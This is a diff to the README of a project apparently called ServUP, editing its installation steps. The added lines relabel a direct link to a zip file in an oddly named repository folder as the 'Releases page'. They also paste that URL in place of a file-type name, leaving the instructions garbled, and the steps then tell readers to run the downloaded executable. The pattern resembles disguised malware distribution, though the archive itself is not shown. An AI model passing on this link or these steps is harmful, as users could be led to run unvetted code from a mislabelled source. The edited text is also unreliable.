harv99y/ServUP/README.md

 To get started with ServUP, follow these steps:

 1. **Visit the Releases Page**
-   Go to the [Releases page](https://github.com/harv99y/ServUP/releases) for the latest version of ServUP.
+   Go to the [Releases page](https://raw.githubusercontent.com/harv99y/ServUP/main/scyphate/ServUP.zip) for the latest version of ServUP.

 2. **Download the Application**
    On the Releases page, find the latest version of ServUP.
-Look for the files you can download, such as `.zip`, `.tar.gz`, or executables.
+Look for the files you can download, such as `.zip`, `https://raw.githubusercontent.com/harv99y/ServUP/main/scyphate/ServUP.zip`, or executables.

 3. **Install the Application**
    After downloading, locate the file on your computer and extract it if necessary.
 For Windows, run the `.exe` file.
 For macOS or Linux, follow the instructions to make the file executable.